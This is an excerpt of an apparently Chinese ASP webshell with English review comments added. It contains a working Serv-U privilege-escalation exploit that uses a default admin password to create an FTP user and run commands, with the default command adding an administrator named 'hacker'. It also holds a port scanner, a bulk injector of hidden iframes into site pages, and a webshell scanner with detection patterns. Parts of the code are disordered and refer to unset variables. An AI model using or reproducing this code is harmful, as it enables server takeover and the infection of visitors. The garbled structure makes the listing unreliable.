set conn = server.createobject("adodb.connection")
connstr="provider=sqloledb.1;data source=" & targetip &","&
portnum &";user id=lake2;password=;"
conn.connectiontimeout = 1
conn.open connstr
if err then
if err.number = -2147217843 or err.number = -2147467259
then
if instr(err.description, "(connect()).") > 0
then
rrs(targetip & ":" & portnum &
".........关闭<br>")
else
rrs(targetip & ":" & portnum &
".........<font color=red>开放</font><br>")
end if
end if
end if
end sub
select case action
case "mainmenu":mainmenu()
case "getterminalinfo":getterminalinfo()
case "scanport":scanport()
case "servu"
suaction=request("suaction")
if not isnumeric(suaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "user " & user & vbcrlf
loginpass = "pass " & pass & vbcrlf
deldomain = "-deletedomain" & vbcrlf & "-ip=0.0.0.0" & vbcrlf & "
portno=" & ftpport & vbcrlf
mt = "site maintenance" & vbcrlf
newdomain = "-setdomain" & vbcrlf & "-domain=goldsun|0.0.0.0|" &
ftpport & "|-1|1|0" & vbcrlf & "-tzoenable=0" & vbcrlf & " tzokey=" &
vbcrlf
newuser = "-setusersetup" & vbcrlf & "-ip=0.0.0.0" & vbcrlf & "-
portno=" & ftpport & vbcrlf & "-user=go" & vbcrlf & "-password=od" &
vbcrlf & _
"-homedir=c:\\" & vbcrlf & "-loginmesfile=" & vbcrlf & "-
disable=0" & vbcrlf & "-relpaths=1" & vbcrlf & _
"-needsecure=0" & vbcrlf & "-hidehidden=0" & vbcrlf & "-
alwaysallowlogin=0" & vbcrlf & "-changepassword=0" & vbcrlf & _
"-quotaenable=0" & vbcrlf & "-maxusersloginperip=-1" & vbcrlf &
"-speedlimitup=0" & vbcrlf & "-speedlimitdown=0" & vbcrlf & _
"-maxnrusers=-1" & vbcrlf & "-idletimeout=600" & vbcrlf & "-
sessiontimeout=-1" & vbcrlf & "-expire=0" & vbcrlf & "-ratioup=1" &
vbcrlf & _
"-ratiodown=1" & vbcrlf & "-ratioscredit=0" & vbcrlf & "-
quotacurrent=0" & vbcrlf & "-quotamaximum=0" & vbcrlf & _
"-maintenance=system" & vbcrlf & "-passwordtype=regular" &
vbcrlf & "-ratios=none" & vbcrlf & " access=c:\\|rwamelcdp" & vbcrlf
quit = "quit" & vbcrlf
newuser=replace(newuser,"c:",f)
select case suaction
case 1
set a=server.createobject("microsoft.xmlhttp")
a.open "get", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",true,
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser &
quit
set session("a")=a
rrs"<form method='post' name='goldsun'>"
rrs"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
rrs"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
rrs"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
rrs"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
rrs"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
rrs"<input name='suaction' type='hidden' id='suaction'
value='2'></form>"
rrs"<script language='javascript'>"
rrs"document.write('<center>正在连接 127.0.0.1:"&port&",使用用户名:
"&user&",口令:"&pass&"...<center>');"
rrs"settimeout('document.all.goldsun.submit();',4000);"
rrs"</script>"
case 2
set b=server.createobject("microsoft.xmlhttp")
b.open "get", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2",
true, "", ""
b.send "user go" & vbcrlf & "pass od" & vbcrlf & "site exec " & cmd &
vbcrlf & quit
set session("b")=b
rrs"<form method='post' name='goldsun'>"
rrs"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
rrs"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
rrs"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
rrs"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
rrs"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
rrs"<input name='suaction' type='hidden' id='suaction'
value='3'></form>"
rrs"<script language='javascript'>"
rrs"document.write('<center>正在提升权限,请等待…………<center>');"
rrs"settimeout(""document.all.goldsun.submit();"",4000);"
rrs"</script>"
case 3
set c=server.createobject("microsoft.xmlhttp")
a.open "get", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", true,
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
rrs"<center>提权完毕,已执行了命令:<br><font
color=red>"&cmd&"</font><br><br>"
rrs"<input type=button value=' 返回继续 ' onclick=""location.href='?
action=servu';"">"
rrs"</center>"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
set a = nothing
b.abort
set b = nothing
c.abort
set c = nothing
rrs"<center><form method='post' name='goldsun'>"
rrs"<table width='494' height='163' border='1' cellpadding='0'
cellspacing='1' bordercolor='#666666'>"
rrs"<tr align='center' valign='middle'>"
rrs"<td colspan='2'>serv-u 提升权限 漫步云端修改版</td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td width='100'>用户名:</td>"
rrs"<td width='379'><input name='u' type='text' id='u'
value='localadministrator'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>口 令:</td>"
rrs"<td><input name='p' type='text' id='p'
value='#l@$ak#.lk;0@p'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>端 口:</td>"
rrs"<td><input name='port' type='text' id='port' value='43958'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>系统路径:</td>"
rrs" <td><input name='f' type='text' id='f' value='"&f&"'
size='8'></td>"
rrs" </tr>"
rrs" <tr align='center' valign='middle'>"
rrs" <td>命 令:</td>"
rrs" <td><input name='c' type='text' id='c' value='cmd /c net user
hacker 123456 /add & net localgroup administrators hacker /add'
size='50'></td>"
rrs" </tr>"
rrs" <tr align='center' valign='middle'>"
rrs" <td colspan='2'><input type='submit' name='submit' value='提
交'> "
rrs"<input type='reset' name='submit2' value='重置'>"
rrs"<input name='suaction' type='hidden' id='action' value='1'></td>"
rrs"</tr></table></form></center>"
end select
' Returns a lower-cased drive prefix such as "c:": the first two characters
' of special folder 0 reported by scripting.filesystemobject. Falls back to
' the literal "c:" when err.number is positive after trying to create the
' object.
' In this listing the function sits between two case branches of the action
' dispatcher; that placement is as printed on the page.
function gpath()
on error resume next
err.clear
set f=server.createobject("scripting.filesystemobject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.getspecialfolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
case "kmuma"
dim report
if request.querystring("act")<>"scan" then
rrs ("<b>网站根目录</b>- "&server.mappath("/")&"<br>")
rrs ("<b>本程序目录</b>- "&server.mappath("."))
rrs "<form action=""?action=kmuma&act=scan""
method=""post"" name=""form1"">"
rrs "<p><b>填入你要检查的路径:</b>"
rrs "<input name=""path"" type=""text""
style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”网站
根目录;“.”为本程序目录<br><br>"
rrs "你要干什么: <input class=c name=""radiobutton""
type=""radio"" value=""sws"" onclick=""document.getelementbyid
('showfile1').style.display='none'"" checked>查asp 马"
rrs "<input class=c type=""radio"" name=""radiobutton""
value=""sf"" onclick=""document.getelementbyid
('showfile1').style.display=''"">搜索符合条件之文件<br>"
rrs "<br /><div id=""showfile1""
style=""display:none"">"
rrs " 查找内容:<input
name=""search_content"" type=""text"" id=""search_content""
style=""border:1px solid #999"" size=""20"">"
rrs " 要查找的字符串,不填就只进行日期检查<br />"
rrs " 修改日期:<input name=""search_date""
type=""text"" style=""border:1px solid #999"" value="""&left(now
(),instr(now()," ")-1)&""" size=""20""> 多个日期用;隔开,任意日期填写
<a href=""#""
onclick=""javascript:form1.search_date.value='all'"">all</a><br />"
rrs " 文件类型:<input
name=""search_fileext"" type=""text"" style=""border:1px solid #999""
value=""*"" size=""20""> 类型之间用,隔开,*表示所有类型<br /><br
/></div>"
rrs "<input type=""submit"" value="" 开始扫描 ""
style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px
2px;margin:4px;"" />"
rrs "</form>"
else
if request.form("path")="" then
rrs("路径不能为空")
response.end()
end if
if request.form("path")="\" then
tmppath = server.mappath("\")
elseif request.form("path")="." then
tmppath = server.mappath(".")
else
tmppath = request.form("path")
end if
timer1 = timer
sun = 0
sumfiles = 0
sumfolders = 1
if request.form("radiobutton") = "sws" then
dimfileext = "asp,cer,asa,cdx"
call showallfile(tmppath)
else
if request.form("path") = "" or request.form
("search_date") = "" or request.form("search_fileext") = "" then
rrs("缉捕条件不完全<br><br><a
href='javascript:history.go(-1);'>请返回重新输入</a>")
response.end()
end if
dimfileext = request.form("search_fileext")
call showallfile2(tmppath)
end if
rrs "<table width=""100%"" border=""0"" cellpadding=""0""
cellspacing=""0"" style='font-size:12px'>"
rrs "<tr><th>scan webshell -- 漫步云端修改版</tr>"
rrs "<tr><td style=""padding:5px;line-height:170%;clear:both;font-
size:12px"">"
rrs "<div id=""updateinfo"" style=""background:ffffe1;border:1px solid
#89441f;padding:4px;display:none""></div>"
rrs "扫描完毕!一共检查文件夹<font
color=""#ff0000"">"&sumfolders&"</font>个,文件<font
color=""#ff0000"">"&sumfiles&"</font>个,发现可疑点<font
color=""#ff0000"">"&sun&"</font>个"
rrs "<table width=""100%"" border=""1"" cellpadding=""0""
cellspacing=""8"" bordercolor=""#999999"" style=""font-
size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
if request.form("radiobutton") = "sws" then
rrs "<td width=""20%"">文件相对路径</td>"
rrs "<td width=""20%"">特征码</td>"
rrs "<td width=""40%"">描述</td>"
rrs "<td width=""20%"">创建/修改时间</td>"
else
rrs "<td width=""50%"">文件相对路径</td>"
rrs "<td width=""25%"">文件创建时间</td>"
rrs "<td width=""25%"">修改时间</td>"
end if
rrs "</tr>"
rrs report
rrs "<br/></table>"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
rrs "<br><font style='font-size:12px'>本页执行共用了"&thetime&"毫秒
</font>"
end if
' showallfile: recursive directory walk used by the "sws" scan mode.
' For every file directly under path whose extension passes checkext, the
' file is handed to scanfile and the script-level sumfiles counter is bumped.
' Each subfolder is then walked the same way and counted in sumfolders.
' A path that is not an existing folder is skipped silently.
sub showallfile(path)
set f1so = createobject("scripting.filesystemobject")
if not f1so.folderexists(path) then exit sub
set f = f1so.getfolder(path)
set fc2 = f.files
for each myfile in fc2
if checkext(f1so.getextensionname
(path&"\"&myfile.name)) then
' NOTE(review): temp is not assigned in this sub; whatever it contributes to
' the path comes from state set elsewhere - confirm before trusting this path.
call scanfile(path&temp&"\"&myfile.name, "")
sumfiles = sumfiles + 1
end if
next
' Recurse into every subfolder; no depth limit is applied here.
set fc = f.subfolders
for each f1 in fc
showallfile path&"\"&f1.name
sumfolders = sumfolders + 1
next
set f1so = nothing
end sub
' scanfile: heuristic content scan of a single file. Each hit appends one HTML
' table row to the script-level report string and increments sun.
'   filepath - path of the file to read
'   infile   - when non-empty, the web-relative path of the file that pulled
'              this one in; it is shown in the row as "included by ..."
' The text is lower-cased before matching, so every check is case-insensitive.
' Checks, in order:
'   1. wscript.shell (name or CLSID)          2. shell.application (name or CLSID)
'   3. language=...(vbscript|jscript|javascript).encode   (encoded script)
'   4. eval   5. execute   6. .opentextfile/.createtextfile
'   7. .savetofile   8. .save
'   9. #include file / #include virtual / server.execute|transfer with a
'      literal target: the target is scanned recursively
'  10. server.execute|transfer with a non-literal target: flagged as untraceable
'  11. <script ... runat=server> with a src attribute: the src file is scanned
'  12. createobject(...) whose argument is concatenated, unquoted or nested
' All checks are plain substring or regex matches, so false positives are
' expected (the eval row says so itself).
' The indicator literals are split with & (and with domybest, which is not
' assigned anywhere in the visible code), so this file does not contain the
' contiguous strings it searches for. When matching these indicators on disk,
' expect the same splitting in real samples and normalise concatenation first.
sub scanfile(filepath, infile)
server.scripttimeout=999999999
' Build the "included by <infile>" note that is appended to every row.
if infile <> "" then
infiles = "<font color=red>该文件被<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(infile)&""" target=_blank>"& infile & "</a>文件包含执行</font>"
end if
set fso1s = createobject("scripting.filesystemobject")
' From here on errors are suppressed; an unreadable file ends the sub.
on error resume next
set ofile = fso1s.opentextfile(filepath)
filetxt = lcase(ofile.readall())
if err then exit sub end if
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
' temp is the first table cell: a link to the file relative to the web root
' plus edit/delete/copy/move links that call fullform (defined outside this
' sub). The path is inserted into the HTML without escaping.
temp = "<a href=""http://"&request.servervariables
("server_name")&"/"&turlencode(replace(replace(filepath,server.mappath
("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace
(filepath,server.mappath("\")&"\","",1,1,1)&"</a><br />"
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
' Check 1: the command-execution COM object, by ProgID or by CLSID.
' After the first hit temp becomes a "same as above" marker for later rows.
if instr( filetxt, lcase
("wscr"&domybest&"ipt.shell") ) or instr( filetxt, lcase
("clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8") ) then
report =
report&"<tr><td>"&temp&"</td><td>wscr"&domybest&"ipt.shell 或者
clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8</td><td><font
color=red>危险组件,一般被asp木马利用
</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
' Check 2: shell.application, by ProgID or by CLSID.
if instr( filetxt, lcase
("she"&domybest&"ll.application") ) or instr( filetxt, lcase
("clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000") ) then
report =
report&"<tr><td>"&temp&"</td><td>she"&domybest&"ll.application 或者
clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000</td><td><font
color=red>危险组件,一般被asp木马利用
</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
' Check 3: a language=...encode attribute, reported as "script appears encoded".
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "\blanguage\s*=\s*[""]?\s*
(vbscript|jscript|javascript).encode\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>
(vbscript|jscript|javascript).encode</td><td><font color=red>似乎脚本被
加密了</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
' Check 4: the word eval. The row text notes that client-side javascript also
' uses it, so this may be a false positive.
regex.pattern = "\bev"&"al\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>ev"&"al</td><td>e"&"val()函数可以执行
任意asp代码<br>但是javascript代码中也可以使用,有可能是误
报。"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify
(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
' Check 5: the word execute when the preceding character is not a dot
' (so method calls such as obj.execute are not matched by this pattern).
regex.pattern = "[^.]\bexe"&"cute\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>exec"&"ute</td><td><font
color=red>e"&"xecute()函数可以执行任意asp代码
</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
' Checks 6-8: file read/write primitives (.opentextfile/.createtextfile,
' .savetofile, .save). These are reported without the red highlight.
regex.pattern = "\.(open|create)textfile\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.createtextfile|.opentextfile</td><td>
使用了fso的createtextfile|opentextfile读写文
件"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify
(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.savetofile\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.savetofile</td><td>使用了stream的
savetofile函数写文件"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.save\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.save</td><td>使用了xmlhttp的save函数
写文件"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
set regex = nothing
' Check 9a: follow #include file="...". The target is resolved relative to the
' including file's folder and scanned only when its extension does NOT pass
' checkext.
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tfile, replace(filepath,server.mappath("\")
&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
' Check 9b: follow #include virtual="...", resolved against the web root.
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "<!--
\s*#include\s*virtual\s*=\s*"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( server.mappath("\")
&"\"&tfile, replace(filepath,server.mappath("\")&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
' Check 9c: follow server.execute / server.transfer when the target is a
' quoted literal; resolved relative to the calling file's folder.
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "server.(exec"&"ute|transfer)([ \t]
*|\()"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tfile, replace(filepath,server.mappath("\")
&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
' Check 10: server.execute / server.transfer whose argument is not a quoted
' literal. The target cannot be resolved statically, so the row only says the
' executed file could not be followed.
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "server.(exec"&"ute|transfer)([ \t]
*|\()[^""]\)"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>server.exec"&"ute</td><td><font
color=red>不能跟踪检查server.e"&"xecute()函数执行的文件。
</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
end if
set matches = nothing
set regex = nothing
' Check 11: <script ... runat=server ...> tags. When the tag carries a src
' attribute its value is extracted by hand (quoted or unquoted) and the
' referenced file is scanned, resolved relative to this file's folder.
set xregex = new regexp
xregex.ignorecase = true
xregex.global = true
xregex.pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?
server""?(.|\n)*?>"
set xmatches = xregex.execute(filetxt)
for each match in xmatches
tmplake2 = mid(match.value, 1, instr
(match.value, ">"))
srcseek = instr(1, tmplake2, "src", 1)
if srcseek > 0 then
srcseek2 = instr(srcseek, tmplake2,
"=")
for i = 1 to 50
tmp = mid(tmplake2, srcseek2 +
i, 1)
if tmp <> " " and tmp <> chr(9)
and tmp <> vbcrlf then
exit for
end if
next
if tmp = """" then
tmpname = mid(tmplake2,
srcseek2 + i + 1, instr(srcseek2 + i + 1, tmplake2, """") - srcseek2 -
i - 1)
else
if instr(srcseek2 + i + 1,
tmplake2, " ") > 0 then tmpname = mid(tmplake2, srcseek2 + i, instr
(srcseek2 + i + 1, tmplake2, " ") - srcseek2 - i) else tmpname =
tmplake2
if instr(tmpname, chr(9)) > 0
then tmpname = mid(tmpname, 1, instr(1, tmpname, chr(9)) - 1)
if instr(tmpname, vbcrlf) > 0
then tmpname = mid(tmpname, 1, instr(1, tmpname, vbcrlf) - 1)
if instr(tmpname, ">") > 0 then
tmpname = mid(tmpname, 1, instr(1, tmpname, ">") - 1)
end if
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tmpname , replace(filepath,server.mappath("\")
&"\","",1,1,1))
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
' Check 12: createobject(...) calls whose text contains & or +, has no double
' quote, or has more than one "(". The row labels this as an obfuscated
' createobject. The sub exits on the first such hit, so the cleanup lines at
' the end are not reached on that path.
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "createo"&"bject[ |\t]*\(.*\)"
set matches = regex.execute(filetxt)
for each match in matches
if instr(match.value, "&") or instr
(match.value, "+") or instr(match.value, """") = 0 or instr
(match.value, "(") <> instrrev(match.value, "(") then
report =
report&"<tr><td>"&temp&"</td><td>creat"&"eobject</td><td>crea"&"teobjec
t函数使用了变形技术"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
exit sub
end if
next
set matches = nothing
set regex = nothing
end if
set ofile = nothing
set fso1s = nothing
end sub
' checkext: reports whether fileext is selected by the script-level
' dimfileext filter (a comma-separated extension list, or "*" for everything).
'   fileext - extension without the dot; it is lower-cased before comparing
' Returns true on a match; otherwise the return value is left unassigned
' (Empty), which callers treat as false.
' The list entries are compared as written, so an upper-case or
' space-padded entry in dimfileext never matches.
function checkext(fileext)
' The wildcard sets the result but does not return; the loop below still runs.
if dimfileext = "*" then checkext = true
ext = split(dimfileext,",")
for i = 0 to ubound(ext)
if lcase(fileext) = ext(i) then
checkext = true
exit function
end if
next
end function
' getdatemodify: returns the datelastmodified value the file system reports
' for filepath, read through a filesystemobject file handle.
' No error handling is done here; a missing file is the caller's problem.
function getdatemodify(filepath)
set f2so = createobject("scripting.filesystemobject")
set f = f2so.getfile(filepath)
s = f.datelastmodified
set f = nothing
set f2so = nothing
getdatemodify = s
end function
' getdatecreate: returns the datecreated value the file system reports for
' filepath, read through a filesystemobject file handle.
' No error handling is done here; a missing file is the caller's problem.
function getdatecreate(filepath)
set f3so = createobject("scripting.filesystemobject")
set f = f3so.getfile(filepath)
s = f.datecreated
set f = nothing
set f3so = nothing
getdatecreate = s
end function
' turlencode: minimal escaping for paths placed in href attributes.
' Only three characters are rewritten: % -> %25, # -> %23, & -> %26.
' "%" is handled first so the escapes added afterwards are not re-encoded.
' Quotes, angle brackets and spaces pass through unchanged, so this is
' neither a full URL encoder nor an HTML encoder.
function turlencode(str)
temp = replace(str, "%", "%25")
temp = replace(temp, "#", "%23")
temp = replace(temp, "&", "%26")
turlencode = temp
end function
' showallfile2: recursive directory walk for the file-search mode.
' Same traversal as showallfile, but each file whose extension passes
' checkext is handed to isfind (date/content filter) instead of scanfile.
' Updates the script-level sumfiles and sumfolders counters.
sub showallfile2(path)
set f4so = createobject("scripting.filesystemobject")
if not f4so.folderexists(path) then exit sub
set f = f4so.getfolder(path)
set fc2 = f.files
for each myfile in fc2
if checkext(f4so.getextensionname
(path&"\"&myfile.name)) then
call isfind(path&"\"&myfile.name)
sumfiles = sumfiles + 1
end if
next
' Recurse into every subfolder; no depth limit is applied here.
set fc = f.subfolders
for each f1 in fc
showallfile2 path&"\"&f1.name
sumfolders = sumfolders + 1
next
set f4so = nothing
end sub
' isfind: file-search filter for one file. A row is appended to the
' script-level report string when the file's last-modified date matches the
' submitted search_date list and, if search_content was supplied, the file
' text contains that string (case-insensitive).
'   thepath - path of the file to test
' Reads request.form("search_date") (dates separated by ";", or "all") and
' request("search_content") directly from the HTTP request.
' NOTE(review): several links below are built from filepath, which is not a
' parameter or local of this sub; its value depends on state outside view.
sub isfind(thepath)
thedate = getdatemodify(thepath)
on error resume next
' Keep only the date part (text before the first space) for comparison.
thetmp = mid(thedate, 1, instr(thedate, " ") - 1)
if err then exit sub
xdate = split(request.form("search_date"),";")
if request.form("search_date") = "all" then alltime = true
for i = 0 to ubound(xdate)
if thetmp = xdate(i) or alltime = true then
' Content filter requested: read the whole file and do a substring search.
if request("search_content") <> "" then
set fso2s = createobject
("scripting.filesystemobject")
set ofile = fso2s.opentextfile(thepath,
1, false, -2)
filetxt = lcase(ofile.readall())
if instr( filetxt, lcase(request.form
("search_content"))) > 0 then
temp = "<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(replace(replace(thepath,server.mappath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thepath,server.mappath("\")&"\","",1,1,1)
&"</a>"
temp=temp&" → <a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
' The same row is appended twice here (once with height=30, once without).
report = report&"<tr><td
height=30>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
report =
report&"<tr><td>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
sun = sun + 1
exit sub
end if
ofile.close()
set ofile = nothing
set fso2s = nothing
else
' No content filter: a date match alone is enough to report the file.
temp = "<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(replace(replace(filepath,server.mappath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thepath,server.mappath("\")&"\","",1,1,1)
&"</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
report = report&"<tr><td
height=30>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
sun = sun + 1
exit sub
end if
end if
next
end sub
' Action "plgm": entry point of the bulk content-injection feature.
' Request parameters read here: fd (target folder, defaults to the web root),
' ex and pth (edit/save of a single file through file_show / file_save, both
' defined outside this view), newcnt, and code (the markup to append).
' When code is empty it defaults to a zero-width, zero-height iframe; the
' 127.0.0.1 address is the page's placeholder.
' For incident review: requests carrying action=plgm with fd/code parameters,
' and a hidden zero-size iframe appended to many pages at once, are the
' traces this branch leaves.
case "plgm"
server.scripttimeout=1000000
response.buffer=false
rrs ("<b>当前网站绝对路径:")&server.mappath("/")&("</b>")
asp_self=request.servervariables("path_info")
s=request("fd")
if s="" then s=server.mappath("/")
ex=request("ex")
pth=request("pth")
newcnt=request("newcnt")
addcode = request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0
height=0></iframe>"
if ex<>"" and pth<>"" then
select case ex
case "edit"
call file_show(pth)
case "save"
call file_save(pth)
end select
else
' No ex/pth given: render the form asking for the folder and the markup.
' s and addcode are echoed into the form without HTML escaping.
rrs("<form method=""post""> ")
rrs("<table width=560 border=""0"" style=""font-size:12px;"">")
rrs("<tr>")
rrs("<td width=""102"">要挂马文件夹的绝对路径:</td>")
rrs("<td width=""359""><input type=""text"" name=""fd"" value="""&s&"""
size=60></td>")
rrs("<td width=""69""> </td>")
rrs("</tr><tr><td>要挂马的代码:</td>")
rrs("<td><textarea name=""code"" cols=58
rows=""3"">"&addcode&"</textarea></td>")
rrs("<td><input name=""submit"" type=""submit"" value=""开始""></td>")
rrs("</tr></table></form> ")
end if
' ispattern: case-insensitive regular-expression test.
'   patt - regexp pattern text
'   str  - string to test
' Returns true when patt matches anywhere in str, false otherwise.
function ispattern(patt,str)
set regex=new regexp
regex.pattern=patt
regex.ignorecase=true
retval=regex.test(str)
set regex=nothing
if retval=true then
ispattern=true
else
ispattern=false
end if
end function
' Form submission for action "plgm": both the folder (s) and the markup
' (addcode) must be non-empty. The folder is then accepted only if it contains
' "<char>:\" or "<char>:/" where <char> is anything other than a or b
' (case-insensitive, via ispattern); on a match the recursive walk sch starts.
if request.form("submit")<>"" then
